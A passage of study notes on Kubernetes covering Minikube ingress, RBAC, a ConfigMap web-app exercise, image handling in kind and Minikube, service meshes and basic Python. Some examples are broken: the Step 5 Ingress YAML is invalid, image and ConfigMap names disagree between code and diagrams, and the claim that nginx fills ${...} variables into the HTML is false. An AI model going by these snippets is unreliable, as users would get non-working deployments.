annotations:
nginx.ingress.kubernetes.io/rewrite-target: /\$1
spec:
rules:
- host: web-app.info
http:
paths:
- path: /
pathType: Prefix
backend:
service:
name: web-app-service
port:
number: 80
EOF
This will create an ingress that will create a connection outside of the cluster with web-app.info as the host name that will direct all connections to port 80 of web-app-service service that will then forward this to port 80 of the deployment for forwarding to one of the replicas for connection.
kubectl get ingress
NAME CLASS HOSTS ADDRESS PORTS AGE\
web-app-ingress <none> http://web-app.info 80 2m28s
Ensure that the Ingress addon is enabled in Minikube.
minikube addons enable ingress
This command enables the NGINX Ingress Controller in your Minikube cluster.
Obtain the IP address of your Minikube cluster.
minikube ip
This will return the IP address of your Minikube cluster.
Add an entry to your hosts file for web-app.info to the Minikube IP.
echo "$(minikube ip) web-app.info" | sudo tee -a /etc/hosts
This step is necessary because you’ve specifiedweb-app.infoas the host in your Ingress resource.
Now you should be able to access your application by opening a web browser and navigating to: http://web-app.info
If everything is set up correctly, you should see the NGINX welcome page.
If you’re unable to access the application, try the following:
Check Ingress status kubectl get ingress, ensure that the ADDRESS field is populated with an IP address.
Verify ingress kubectl get pods -n ingress-nginx , make sure the Ingress Controller pod is running.
Check ingress logs looking for ERRORS kubectl logs -n ingress-nginx $(kubectl get pods -n ingress-nginx -o name) (this can be run in seperate parts kubectl get pods -n ingress-nginx -o name then run kubectl logs -n ingress-nginx with the ingress)
Last resort you can try port forwarding. kubectl port-forward svc/web-app-service 8080:80 , now access the application at http://localhost:8080
Remember that Minikube is running inside a VM, so network access can sometimes be tricky depending on your setup. The methods described above should work in most cases, but you might need to adjust based on your specific environment
Kubernetes RBAC and Security Concepts
+----------------------------------------------------+
| Kubernetes Cluster |
| |
| +--------------------+ +------------------------+ |
| | RBAC Objects | | Security Contexts | |
| | +---------------+ | | +--------------------+ | |
| | | Roles | | | | Pod Security | | |
| | | (Namespaced) | | | | Context | | |
| | +---------------+ | | | - User/Group | | |
| | | | | | - SELinux | | |
| | v | | | - RunAsUser | | |
| | +---------------+ | | | - Capabilities | | |
| | | RoleBindings | | | +--------------------+ | |
| | | (Namespaced) | | | | | |
| | +----------------+ | | v | |
| | | | +--------------------+ | |
| | +----------------+ | | | Container Security | | |
| | | ClusterRoles | | | | Context | | |
| | | (Cluster- Wide)| | | | - RunAsNonRoot | | |
| | +----------------+ | | | - ReadOnlyRootFS | | |
| | | | | | - Privileged | | |
| | v | | +--------------------+ | |
| | +----------------+ | | | |
| | | ClusterRole- | | +------------------------+ |
| | | Bindings | | |
| | | (Cluster-wide) | | |
| | +----------------+ | |
| | | |
| +--------------------+ |
| |
| +------------------------------------------------+ |
| | Network Policies | |
| | +-------------------+ +----------------------+ | |
| | | Ingress Rules | | Egress Rules | | |
| | | | | | | |
| | | - From: (sources) | | - To: (destinations) | | |
| | | - Ports | | - Ports | | |
| | +-------------------+ +----------------------+ | |
| | | |
| +------------------------------------------------+ |
| |
+----------------------------------------------------+
- RBAC Objects:
- Roles and RoleBindings (namespaced)
- ClusterRoles and ClusterRoleBindings (cluster-wide)
These objects define who can access what resources and perform what actions.
- Security Contexts:
- Pod Security Context: Applies to all containers in a pod
- Container Security Context: Specific to individual containers
These define privilege and access control settings for pods and containers.
- Network Policies:
- Ingress Rules: Control incoming traffic to pods
- Egress Rules: Control outgoing traffic from pods
These act as a virtual firewall for your Kubernetes cluster.
The diagram shows how these components interact within the Kubernetes cluster to provide a comprehensive security model. RBAC controls access to Kubernetes API resources, Security Contexts manage the runtime security settings for pods and containers, and Network Policies control the network traffic between pods and external sources
Role-Based Access Control (RBAC)
- Regulates access to resources based on the roles of individual users.
- Key objects: Role, ClusterRole, RoleBinding, ClusterRoleBinding. Example: Creating a role that allows reading pods: ```yaml apiVersion: rbac.authorization.k8s.io/v1 kind: Role metadata: namespace: default name: pod-reader Rules:
- apiGroups: [””] resources: [“pods”] verbs: [“get”, “watch”, “list”] ```
Security Contexts
- Define privilege and access control settings for Pods or Containers.
- Can set UID, GID, capabilities, and other security parameters.
Network Policies
- Specify how groups of pods are allowed to communicate with each other and other network endpoints.
- Act as a virtual firewall for your Kubernetes cluster.\
Exercise:
Deploying a Configurable Web Application\
In this exercise, we'll create a simple web application that reads its configuration from a ConfigMap. We'll then deploy it to Kubernetes and expose it using a Service and Ingress.
This exercise demonstrates:
- Creating and using ConfigMaps
- Deploying a web application with Kubernetes
- Exposing the application using a Service and Ingress
- Injecting configuration into a container using environment variables
- Mounting ConfigMap data as a volume
- Updating configuration and seeing the changes reflected in the application
- Step 1: Create a ConfigMap
First, let's create a ConfigMap with some configuration data:cat \<\<EOF \| kubectl apply -f - apiVersion: v1 kind: ConfigMap metadata: name: webapp-config data: BACKGROUND_COLOR: \"#f0f0f0\" MESSAGE: \"Welcome to our configurable web app!\" EOF+-------------------------------------------------+ | Kubernetes Cluster | | | | +---------------------------------------------+ | | | ConfigMap | | | | Name: webapp-config | | | | Data: | | | | +-----------------------------------------+ | | | | | Key | Value | | | | | +------------------+----------------------+ | | | | | BACKGROUND_COLOR | "#f0f0f0" | | | | | +------------------+----------------------+ | | | | | MESSAGE | "Welcome to our | | | | | | | configurable web app"| | | | | +------------------+----------------------+ | | | | | | | +---------------------------------------------+ | | | +-------------------------------------------------+This diagram shows:
- The overall Kubernetes cluster environment.
- Within the cluster, a ConfigMap named "webapp-config" is created.
- The ConfigMap contains two key-value pairs:
- BACKGROUND_COLOR: "#f0f0f0"
- MESSAGE: "Welcome to our configurable web app!"
The diagram illustrates how the ConfigMap stores configuration data as key-value pairs, which can be used by applications running in the cluster. This ConfigMap could be mounted as a volume or used as environment variables in a Pod, allowing the application to access these configuration values at runtime.
- Step 2: Create a Deployment
Now, let's create a Deployment for our web application. We'll use a simple Nginx image and inject our configuration as environment variables:
cat <<EOF | kubectl apply -f -
apiVersion: apps/v1
kind: Deployment
metadata:
name: webapp
spec:
replicas: 2
selector:
matchLabels:
app: webapp
template:
metadata:
labels:
app: webapp
spec:
containers:
- name: webapp
image: nginxtest
ports:
- containerPort: 80
envFrom:
- configMapRef:
name: webapp-config
volumeMounts:
- name: config
mountPath: /usr/share/nginx/html
volumes:
- name: config
configMap:
name: webapp-content
items:
- key: index.html
path: index.html
EOF
+----------------------------------------------------+
| Kubernetes Cluster |
| |
| +------------------------------------------------+ |
| | Deployment: webapp | |
| | | |
| | +--------------------------------------------+ | |
| | | ReplicaSet (2 replicas) | | |
| | | | | |
| | | +----------------------------------------+ | | |
| | | | Pod 1 | | | |
| | | | | | | |
| | | | +------------------------------------+ | | | |
| | | | | Container: webapp | | | | |
| | | | | | | | | |
| | | | | Image: nginx:alpine | | | | |
| | | | | Port: 80 | | | | |
| | | | | | | | | |
| | | | | EnvFrom: | | | | |
| | | | | ConfigMap: webapp-config | | | | |
| | | | | | | | | |
| | | | | VolumeMount: | | | | |
| | | | | Name: config | | | | |
| | | | | MountPath: /usr/share/nginx/html | | | | |
| | | | +------------------------------------+ | | | |
| | | | | | | |
| | | | +------------------------------------+ | | | |
| | | | | Volume: config | | | | |
| | | | | ConfigMap: webapp-config | | | | |
| | | | | Key: index.html | | | | |
| | | | | Path: index.html | | | | |
| | | | +------------------------------------+ | | | |
| | | | | | | |
| | | +----------------------------------------+ | | |
| | | | | |
| | | +------------------------------------+ | | |
| | | | Pod 2 | | | |
| | | | (Same structure as Pod 1) | | | |
| | | +------------------------------------+ | | |
| | | | | |
| | +--------------------------------------------+ | |
| | | |
| +------------------------------------------------+ |
| |
+----------------------------------------------------+
This diagram illustrates:
- The overall Kubernetes Deployment named “webapp”.
- The ReplicaSet managing 2 replicas (Pods).
- The structure of each Pod, including:
- The container named “webapp” using the nginx:alpine image.
- The container port 80 exposed.
- Environment variables loaded from the ConfigMap “webapp-config”
- A volume mount for the “/usr/share/nginx/html” path.\ - The volume configuration, which mounts the “index.html” key from the “webapp-config” ConfigMap.
The diagram shows how the Deployment manages multiple identical Pods, each containing a container with the specified configuration. It also illustrates the use of ConfigMaps for both environment variables and file mounting, demonstrating how Kubernetes can inject configuration data into containers.
- Step 3: Create a ConfigMap for the HTML content
Let's create another ConfigMap to hold our HTML content:
cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: ConfigMap
metadata:
name: webapp-content
data:
index.html: |
<!DOCTYPE html>
<html>
<head>
<title>Configurable Web App\</title\>
<style>
body { background-color: ${BACKGROUND_COLOR}; font-family: Arial,sans-serif; }
</style>
</head>
<body>
<h1>${MESSAGE}</h1>
<p\>This page is served by Nginx and configured using Kubernetes ConfigMaps.</p>
</body>
</html>
EOF
+----------------------------------------------------+
| Kubernetes Cluster |
| |
| +----------------------------------------------+ |
| | ConfigMap: webapp-config | |
| | | |
| | Data: | |
| | BACKGROUND_COLOR: "#f0f0f0" | |
| | MESSAGE: "Welcome to our configurable\..." | |
| +----------------------------------------------+ |
| |
| +----------------------------------------------+ |
| | ConfigMap: webapp-content | |
| | | |
| | Data: | |
| | index.html: (HTML content) | |
| | - Uses ${BACKGROUND_COLOR} | |
| | - Uses ${MESSAGE} | |
| +----------------------------------------------+ |
| |
| +----------------------------------------------+ |
| | Deployment: webapp | |
| | | |
| | +----------------------------------------+ | |
| | | Pod | | |
| | | +-------------------------------+ | | |
| | | | Container: webapp | | | |
| | | | | | | |
| | | | - Image: nginx:alpine | | | |
| | | | - Port: 80 | | | |
| | | | | | | |
| | | | EnvFrom: | | | |
| | | | ConfigMap: webapp-config | | | |
| | | | | | | |
| | | | VolumeMount: | | | |
| | | | Name: config | | | |
| | | | MountPath: /usr/share/\... | | | |
| | | +-------------------------------+ | | |
| | | | | |
| | | +-------------------------------+ | | |
| | | | Volume: config | | | |
| | | | ConfigMap: webapp-content | | | |
| | | | Key: index.html | | | |
| | | | Path: index.html | | | |
| | | +-------------------------------+ | | |
| | +----------------------------------------+ | |
| +----------------------------------------------+ |
+----------------------------------------------------+
This updated diagram now includes:
- The original
webapp-configConfigMap withBACKGROUND_COLORandMESSAGE. - The new
webapp-contentConfigMap containing theindex.htmltemplate. - The Deployment and Pod structure, showing how these ConfigMaps are used:
webapp-configis used as environment variables (envFrom).webapp-contentis mounted as a volume, providing theindex.htmlfile.
The new webapp-content ConfigMap contains an HTML template that uses the ${BACKGROUND_COLOR} and ${MESSAGE} variables. These variables will be replaced with the actual values from the webapp-config ConfigMap when the page is served. This setup allows for a dynamic, configurable web application where:
- The content of the page (HTML structure) is defined in one ConfigMap (
webapp-content). - The configuration values (background colour and message) are defined in another ConfigMap (
webapp-config). - The Nginx container serves the HTML content, with the variables replaced by the actual configuration values.
This separation of concerns makes it easy to update either the content template or the configuration values independently, providing flexibility in managing your web application's appearance and content.
- Step 4: Create a Service
Now, let\’s create a Service to expose our Deployment:
cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Service
metadata:
name: webapp-service
spec:
selector:
app: webapp
ports:
- protocol: TCP
port: 80
targetPort: 80
EOF
+---------------------------------------------------+
| Kubernetes Cluster |
| |
| +---------------------------------------------+ |
| | ConfigMap: webapp-config | |
| | | |
| | Data: | |
| | BACKGROUND_COLOR: "#f0f0f0" | |
| | MESSAGE: "Welcome to our configurable..." | |
| +---------------------------------------------+ |
| |
| +---------------------------------------------+ |
| | ConfigMap: webapp-content | |
| | | |
| | Data: | |
| | index.html: (HTML content) | |
| | - Uses ${BACKGROUND_COLOR} | |
| | - Uses ${MESSAGE} | |
| +---------------------------------------------+ |
| |
| +---------------------------------------------+ |
| | Deployment: webapp | |
| | | |
| | +---------------------------------------+ | |
| | | Pod | | |
| | | +-------------------------------+ | | |
| | | | Container: webapp | | | |
| | | | | | | |
| | | | - Image: nginx:alpine | | | |
| | | | - Port: 80 | | | |
| | | | | | | |
| | | | EnvFrom: | | | |
| | | | ConfigMap: webapp-config | | | |
| | | | | | | |
| | | | VolumeMount: | | | |
| | | | Name: config | | | |
| | | | MountPath: /usr/share/... | | | |
| | | +-------------------------------+ | | |
| | | | | |
| | | +-------------------------------+ | | |
| | | | Volume: config | | | |
| | | | ConfigMap: webapp-content | | | |
| | | | Key: index.html | | | |
| | | | Path: index.html | | | |
| | | +-------------------------------+ | | |
| | +---------------------------------------+ | |
| +---------------------------------------------+ |
| |
| +---------------------------------------------+ |
| | Service: webapp-service | |
| | | |
| | Selector: app: webapp | |
| | Port: 80 -> targetPort: 80 | |
| +---------------------------------------------+ |
+---------------------------------------------------+
This updated diagram now includes:
- The original
webapp-configConfigMap withBACKGROUND_COLORandMESSAGE. - The
webapp-contentConfigMap containing theindex.htmltemplate. - The Deployment and Pod structure, showing how these ConfigMaps are used.
- The new webapp-service Service, which:
- Selects Pods with the label app: webapp
- Exposes port 80 and forwards traffic to the Pods' port 80
The Service acts as a stable network endpoint for the Pods created by the Deployment. It provides:
- Load balancing: Distributes incoming traffic across all Pods matching the selector.
- Service discovery: Provides a stable IP address and DNS name for the set of Pods.
- Port mapping: Maps the Service port (80) to the target port on the Pods (also 80 in this case).
This Service allows other components within the cluster (or external to the cluster, depending on the Service type) to access the webapp Pods without needing to know the individual Pod IP addresses. It adds a layer of abstraction that enhances the scalability and flexibility of your application.The flow of traffic would typically be:External Request -> Service (webapp-service) -> Pod (webapp) -> Container (nginx:alpine) This setup allows you to scale your Deployment (adding or removing Pods) without changing how other components interact with your webapp, as they will always communicate through the Service.
- Step 5: Create an Ingress
If your cluster has an Ingress controller, you can create an Ingress resource:
cat <<EOF | kubectl apply -f -
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
name: webapp-ingress
annotations:
nginx.ingress.kubernetes.io/rewrite-target: /
spec:
rules:
- host: webapp.example.com
http:
paths: /
- path:
pathType: Prefix
backend:
service:
name: webapp-service
port:
number: 80
EOF
+-------------------------------------------------+
| Kubernetes Cluster |
| |
| +-------------------------------------------+ |
| | ConfigMap: webapp-config | |
| | | |
| | Data: | |
| | BACKGROUND_COLOR: "#f0f0f0" | |
| | MESSAGE: "Welcome to our configurable..." | |
| +-------------------------------------------+ |
| |
| +-------------------------------------------+ |
| | ConfigMap: webapp-content | |
| | | |
| | Data: | |
| | index.html: (HTML content) | |
| | - Uses ${BACKGROUND_COLOR} | |
| | - Uses ${MESSAGE} | |
| +-------------------------------------------+ |
| |
| +-------------------------------------------+ |
| | Deployment: webapp | |
| | | |
| | +-------------------------------------+ | |
| | | Pod | | |
| | | +-------------------------------+ | | |
| | | | Container: webapp | | | |
| | | | | | | |
| | | | - Image: nginx:alpine | | | |
| | | | - Port: 80 | | | |
| | | | | | | |
| | | | EnvFrom: | | | |
| | | | ConfigMap: webapp-config | | | |
| | | | | | | |
| | | | VolumeMount: | | | |
| | | | Name: config | | | |
| | | | MountPath: /usr/share/... | | | |
| | | +-------------------------------+ | | |
| | | | | |
| | | +-------------------------------+ | | |
| | | | Volume: config | | | |
| | | | ConfigMap: webapp-content | | | |
| | | | Key: index.html | | | |
| | | | Path: index.html | | | |
| | | +-------------------------------+ | | |
| | +-------------------------------------+ | |
| +-------------------------------------------+ |
| |
| +-------------------------------------------+ |
| | Service: webapp-service | |
| | | |
| | Selector: app: webapp | |
| | Port: 80 -> targetPort: 80 | |
| +-------------------------------------------+ |
| |
| +-------------------------------------------+ |
| | Ingress: webapp-ingress | |
| | | |
| | Host: webapp.example.com | |
| | Path: / | |
| | Backend: webapp-service:80 | |
| +-------------------------------------------+ |
+-------------------------------------------------+
This updated diagram now includes:
- The original webapp-config ConfigMap with
BACKGROUND_COLORandMESSAGE. - The
webapp-contentConfigMap containing theindex.htmltemplate. - The Deployment and Pod structure, showing how these ConfigMaps are used.
- The webapp-service Service that exposes the Pods.
- The new webapp-ingress Ingress resource, which:
- Routes traffic for the host webapp.example.com
- Directs all paths (/) to the webapp-service on port 80
The Ingress resource acts as an entry point for external traffic into the cluster. It provides:
- Host-based routing: It routes traffic based on the
webapp.example.comhostname. - Path-based routing: In this case, all paths (/) are routed to the backend service.
- Integration with the Ingress Controller: The
nginx.ingress.kubernetes.io/rewrite-target: /annotation is specific to the NGINX Ingress Controller, indicating that the path should be rewritten to / when forwarding to the backend.
The flow of traffic would now be: External Request -> Ingress Controller -> Ingress (webapp-ingress) -> Service (webapp-service) -> Pod (webapp) -> Container (nginx:alpine)This setup allows you to:
- Access your application from outside the cluster using a domain name (webapp.example.com).
- Potentially host multiple applications on the same IP address using different hostnames.
- Implement more complex routing rules if needed (e.g., routing different paths to different services).
Remember to ensure that:
- The Ingress Controller is installed in your cluster.
- The DNS for webapp.example.com is configured to point to your cluster's external IP.
- Any necessary TLS certificates are configured if you want to enable HTTPS.
This Ingress resource completes the basic setup of a web application in Kubernetes, providing a full path for external traffic to reach your containerized application.
- Step 6: Verify the deployment
Check if all resources are created and running:
kubectl get configmaps
kubectl get deployments
kubectl get pods
kubectl get services
kubectl get ingress
kubectl get configmaps
NAME DATA AGE
kube-root-ca.crt 1 21m
webapp-config 2 18m
webapp-content 1 13m
kubectl get deployments
NAME READY UP-TO-DATE AVAILABLE AGE
webapp 2/2 2 2 11m
kubectl get pods
NAME READY STATUS RESTARTS AGE
webapp-756448-8hz 1/1 Running 0 7m26s
webapp-756448-b6r 1/1 Running 0 7m33s
kubectl get services
NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE
kubernetes Cluster IP 10.96.0.1 <none> 443/TCP 22m
webapp-service Cluster IP 10.107.192.80 <none> 80/TCP 5m20s
kubectl get ingress
NAME CLASS HOSTS ADDRESS PORTS AGE
webapp-ingress <none> webapp.example.com 80 3m52s
- Step 7: Access the application
If you're using Minikube, you can use port-forwarding to access the application:
kubectl port-forward service/webapp-service 8080:80
Then open a web browser and go to http://localhost:8080.If you're using an Ingress, add the following to your /etc/hosts file:
echo "127.0.0.1 web-app.info" | sudo tee -a /etc/hosts Then access the application at http://webapp.example.com.
- Step 8: Modify the configuration
Let's change the background color and message:
kubectl edit configmap webapp-config
Change the BACKGROUND_COLOR to “#e0e0e0” and the MESSAGE to "Updated configuration!".
- Step 9: Restart the Deployment to pick up the new configuration
kubectl rollout restart deployment webapp - Step 10: Access the application again to see the changes
Day 5: Working with local K8s options
Docker Images in kind
Building a custom Docker image
- Create a Dockerfile for your application.
- Build the image: docker build -t your-image:tag .
Loading the image into kind cluster
- Use the command: kind load docker-image your-image:tag
- This copies the image from your local Docker daemon into the kind cluster.
Limitations and workarounds for Docker-in-Docker scenarios
- kind runs Kubernetes inside Docker, which can complicate building images inside the cluster.
- Workaround: Use kaniko or buildkit for in-cluster builds.
Creating deployments with custom images
- Create a deployment YAML file (e.g., deployment.yaml) referencing your custom image:
apiVersion: apps/v1 kind: Deployment metadata: name: your-app spec: replicas: 1 selector: matchLabels: app: your-app template: metadata: labels: app: your-app spec: containers: - name: your-app image: your-image:tag imagePullPolicy: Never - Apply the deployment:\
kubectl apply -f deployment.yaml
Working with Images in Minikube
Minikube provides several options for working with Docker images:
Using the Host Docker Daemon
- Configure your terminal to use Minikube's Docker daemon:
eval $(minikube docker-env) - Build your image. It will now be available to Minikube without additional steps.
Loading Images into Minikube
- If you've built the image using your host's Docker daemon:
minikube image load your-image:tag - This copies the image from your local Docker daemon into Minikube.
Creating Deployments with Custom Images
- Create a deployment YAML file (e.g., deployment.yaml) referencing your custom image:
apiVersion: apps/v1 kind: Deployment metadata: name: your-app spec: replicas: 1 selector: matchLabels: app: your-app template: metadata: labels: app: your-app spec: containers: - name: your-app image: your-image:tag imagePullPolicy: IfNotPresent - Apply the deployment:
kubectl apply -f deployment.yaml
Minikube-Specific Features
Built-in Docker Registry
Minikube includes a built-in Docker registry. To use it:
- Enable the registry addon:
minikube addons enable registry - Push your image to the Minikube registry:
docker push \$(minikube ip):5000/your-image:tag - Update your deployment to use the registry image:
image: localhost:5000/your-image:tag
Direct Image Building
- Minikube can build images directly using its Docker daemon:
minikube image build -t your-image:tag . - This builds the image inside Minikube, making it immediately available for use.
Monitoring and Troubleshooting
- Check if your pods are running:
kubectl get pods - If pods are not in the "Running" state, check the logs:
kubectl logs \<pod-name\> - For more detailed troubleshooting, use:
kubectl describe pod \<pod-name\> - To access the Minikube Docker daemon logs:
minikube logs
Cleaning Up
To remove unused images and free up space:
minikube image rm your-image:tag
By following these steps, you can effectively work with custom Docker images in your Minikube cluster, allowing you to develop and test your Kubernetes deployments locally. Minikube offers more flexibility in terms of image handling compared to kind, making it a popular choice for local Kubernetes development.
Best Practices
- Use meaningful tags for your images, preferably based on git commit hashes or semantic versioning.
- When updating your application, build a new image with a new tag, then update your deployment to use the new image tag.
- For production-like setups, consider using a private Docker registry. Minikube can be configured to pull from private registries.
Week 2: Service Mesh Concepts and Python
Day 1-2: Service Mesh
Fundamentals
Core concepts of service mesh
- A dedicated infrastructure layer for handling service-to-service communication.
- Provides features like service discovery, load balancing, encryption, observability, traceability, authentication, and authorization.
Problems service meshes solve
- Complexity in microservices communication
- Lack of observability in distributed systems
- Inconsistent security policies across services
- Difficulty in implementing resilience patterns (circuit breaking, retries)
Evolution of ingress
- From simple L7 load balancers to advanced API gateways
- Integration with service mesh for consistent policy enforcement
Service Mesh Architecture
A service mesh consists of two primary components: the data plane and the control plane.
Data Plane
The data plane is composed of a network of lightweight proxies, typically deployed as sidecars alongside each service instance. These proxies intercept and manage all network traffic to and from the service.
Example:
Let's consider a simple e-commerce application with three microservices: Product, Order, and Payment. In a service mesh, each instance of these services would have a sidecar proxy deployed alongside it:
Product Service + Sidecar Proxy Order Service + Sidecar Proxy Payment Service + Sidecar Proxy
When the Order service needs to communicate with the Payment service, the request goes through the following path:
- Order service -> Order's sidecar proxy
- Order's sidecar proxy -> Payment's sidecar proxy
- Payment's sidecar proxy -> Payment service
This allows the mesh to control and observe all inter-service communication.
Control Plane
The control plane manages and configures the proxies to enforce policies, collect telemetry, and handle service discovery.
Example:
Using Istio as an example, the control plane consists of several components:
- Pilot: Handles service discovery and traffic management
- Citadel: Manages security and access policies
- Galley: Validates configuration and distributes it to other components
The control plane would configure the sidecar proxies to implement specific routing rules, such as:
apiVersion: networking.istio.io/v1alpha3
kind: VirtualService
metadata:
name: payment-route
spec:
hosts:
- payment
http:
- route:
- destination:
host: payment
subset: v1
weight: 90
- destination:
host: payment
subset: v2
weight: 10
This configuration would route 90% of traffic to version 1 of the Payment service and 10% to version 2, enabling canary deployments or A/B testing.
Here is an example using Linkerd's control plane. This is simpler and consists of fewer components compared to Istio. The main components are:
- Destination: Handles service discovery and provides configuration to proxies
- Identity: Manages security and certificate issuance for mTLS
- Proxy Injector: Injects the Linkerd proxy as a sidecar
For traffic splitting in Linkerd, you would use either a TrafficSplit resource (if using the SMI extension) or an HTTPRoute resource (which is the preferred method going forward).
Here's an example using HTTPRoute:
apiVersion: policy.linkerd.io/v1beta2
kind: HTTPRoute
metadata:
name: payment-route
namespace: your-namespace
spec:
parentRefs:
- name: payment
kind: Service
group: core
port: 8080
rules:
- backendRefs:
- name: payment-v1
port: 8080
weight: 90
- name: payment-v2
port: 8080
weight: 10
This configuration would achieve the same result as the Istio example, routing 90% of traffic to version 1 of the Payment service and 10% to version 2.
Key Features and Use Cases
Service Discovery and Load Balancing
Service meshes provide dynamic service discovery and intelligent load balancing.
Example:
In our e-commerce application, if we scale the Payment service to three instances, the service mesh would automatically discover these instances and distribute traffic among them. It could use advanced load balancing algorithms like least connections or weighted round-robin.
Traffic Management
Service meshes offer fine-grained control over traffic routing.
Example: Implementing a canary release for the Product service:
apiVersion: networking.istio.io/v1alpha3
kind: VirtualService
metadata:
name: product-canary
spec:
hosts:
- product
http:
- match:
- headers:
user-agent:
regex: ".*Chrome.*"
route:
- destination:
host: product
subset: v2
- route:
- destination:
host: product
subset: v1
This configuration routes all traffic from Chrome browsers to version 2 of the Product service, while all other traffic goes to version 1.
With Linkerd use HTTPRoute resource to define the traffic splitting:
apiVersion: policy.linkerd.io/v1beta2
kind: HTTPRoute
metadata:
name: product-canary
namespace: your-namespace
spec:
parentRefs:
- name: product
kind: Service
group: core
port: 8080
rules:
- matches:
- headers:
- name: user-agent
regex: \".\*Chrome.\*\"
backendRefs:
- name: product-v2
port: 8080
- backendRefs:
- name: product-v1
port: 8080
This configuration routes all traffic from Chrome browsers to version 2 of the Product service, while all other traffic goes to version 1.
For more advanced canary deployments, you can use tools like Flagger with Linkerd. Flagger automates the process of creating new Kubernetes resources, watching metrics, and incrementally sending users to the new version.
Here's an example of how you might set up a Flagger canary for the Product service:
apiVersion: flagger.app/v1beta1
kind: Canary
metadata:
name: product
namespace: test
spec:
targetRef:
apiVersion: apps/v1
kind: Deployment
name: product
service:
port: 8080
analysis:
interval: 30s
threshold: 5
maxWeight: 50
stepWeight: 5
metrics:
- name: success-rate
threshold: 99
interval: 1m
- name: latency
threshold: 500
interval: 1m
This configuration sets up a canary deployment that gradually increases traffic to the new version while monitoring success rate and latency.
Observability
Service meshes provide detailed insights into service-to-service communication.
Example:
Using Istio with Prometheus and Grafana, you can visualize request volume, latency, and error rates for each service. You might see a dashboard showing:
- Request rate for Product service: 100 requests/second
- 95th percentile latency for Order service: 250ms
- Error rate for Payment service: 0.1%
This level of observability helps quickly identify and troubleshoot issues in the distributed system.
Linkerd provides similar observability capabilities to Istio, there are some differences in how it implements and presents these features.
- Using the Linkerd CLI:
linkerd viz stat deploy -n your-namespace
This command would show you a table with metrics for each deployment, including:
- Success rate
- Request per second (RPS)
- Latency (P50, P95, P99)
- Using the Linkerd dashboard:
You can access it by running:
linkerd viz dashboard
In the dashboard, you would see:
- Request rate for Product service: 100 req/sec
- 95th percentile latency for Order service: 250ms
- Success rate for Payment service: 99.9% (which is equivalent to a 0.1% error rate)
Security
Service meshes can enforce mutual TLS (mTLS) encryption and fine-grained access policies.
**Example:
**Enforcing mTLS between all services:
apiVersion: security.istio.io/v1beta1
kind: PeerAuthentication
metadata:
name: default
namespace: istio-system
spec:
mtls:
mode: STRICT
This configuration ensures all inter-service communication is encrypted and authenticated.
Linkerd automatically enables mTLS for all meshed services by default, so you don't need to explicitly configure it. However, if you want to ensure that only mTLS traffic is allowed, you can use Linkerd's authorization policies.
Challenges and Best Practices
While service meshes offer numerous benefits, they also introduce complexity and potential performance overhead.
Performance Considerations
The additional network hops introduced by sidecar proxies can increase latency. It's crucial to benchmark your application with and without the service mesh to understand the performance impact.
Best Practice:Start with a subset of your services in the mesh and gradually expand as you become more comfortable with the technology and its impact on your system.
Complexity Management
Service meshes add another layer to your infrastructure, which can increase operational complexity.
Best Practice:Invest time in your training.
Monitoring and Troubleshooting
While service meshes provide extensive observability, the volume of data can be overwhelming.
Best Practice:Define clear Service Level Objectives (SLOs) and set up alerts based on these. Use distributed tracing to debug complex issues across services.
In conclusion, service meshes offer powerful capabilities for managing microservices architectures, but they require careful planning and implementation. By understanding the core concepts and following best practices, organizations can leverage service meshes to build more resilient, observable, and secure distributed systems.
Day 3-4: Python for Kubernetes
Python basics review (if needed)
Data Types
Python has several built-in data types:
- Numeric: int, float, complex
- Sequence: list, tuple, range
- Text: str
- Mapping: dict
- Set: set, frozense
- Boolean: bool
Example:
Numeric Types
int (Integer)
age = 30
year = 2024
temperature = -5
x = 5
float (Floating-point)
pi = 3.14159
weight = 68.5
temperature = -2.8
y = 3.14
complex
z = 3 + 4j
w = complex(2, -3)
Sequence Types
list
fruits = ["apple", "banana", "cherry"]
numbers = [1, 2, 3, 4, 5]
mixed = [1, "two", 3.0, [4, 5]]
tuple
coordinates = (10, 20)
rgb = (255, 0, 128)
person = (\"John\", 30, \"London\")
range
numbers = range(5) # 0, 1, 2, 3, 4
even_numbers = range(0, 10, 2) # 0, 2, 4, 6, 8
Text Type
str (String)
name = "Alice"
message = 'Hello, World!'
multiline = """This is a
multiline string."""
Mapping Type
dict (Dictionary)
person = {"name": "Bob", "age": 25, "city": "Manchester"}
scores = {
"Alice": 95,
"Bob": 87,
"Charlie": 92
}
Set Types
set
unique_numbers = {1, 2, 3, 4, 5}
fruits = {"apple", "banana", "cherry"}
frozenset
immutable_set = frozenset([1, 2, 3, 4, 5])
Boolean Type
bool
is_raining = True
has_licence = False
is_adult = age >= 18
Here are some examples of how these data types can be used in practice:
# Calculating area of a circle
radius = 5.0
area = pi * radius**2
print(f"The area of the circle is {area:.2f} square units")
# Working with lists
fruits.append("orange")
print(f"The second fruit is {fruits[1]}")
# Using a dictionary
print(f"{person['name']} is {person['age']} years old and lives
in {person['city']}")
# Set operations
a = {1, 2, 3, 4}
b = {3, 4, 5, 6}
print(f"Union: {a | b}")
print(f"Intersection: {a & b}")
# Boolean logic
if is_adult and not is_raining:
print(\"Let\'s go for a walk!")
These examples demonstrate the basic usage of each data type. Remember that Python is dynamically typed, meaning you don't need to declare the type of a variable explicitly. The interpreter infers the type based on the value assigned to it.
[Control Structures]{.underline}
If-else statements:
if x > 0:
print("Positive")
elif x < 0:
print("Negative")
else:
print("Zero")
For loops:
for i in range(5):
print(i)
While loops:
count = 0
while count < 5:
print(count)
count += 1
[Functions]{.underline}
def greet(name):
return f"Hello, {name}!"
message = greet("Alice")
print(message)
[Classes]{.underline}
class Dog:
def __init__(self, name):
self.name = name
def bark(self):
return f"{self.name} says Woof!"
my_dog = Dog("Buddy")
print(my_dog.bark())
Python Package Management
pip
pip is the standard package manager for Python. It allows you to install and manage additional packages that are not part of the Python standard library.
Installing a package:
python3 -m pip install requests
Upgrading a package:
python3 -m pip install --upgrade requests
Python Virtual Environments
Virtual environments are isolated Python environments that allow you to install packages for specific projects without affecting your system-wide Python installation.
Creating a virtual environment:
python3 -m venv .venv
Here's a breakdown of what each part of the command does:
- python3: This specifies that you are using Python 3 to execute the command. It ensures that the virtual environment is created using Python 3.
- -m venv: The -m flag tells Python to run a module as a script. In this case, it runs the venv module, which is included in the standard library from Python 3.3 onwards, for creating virtual environments.
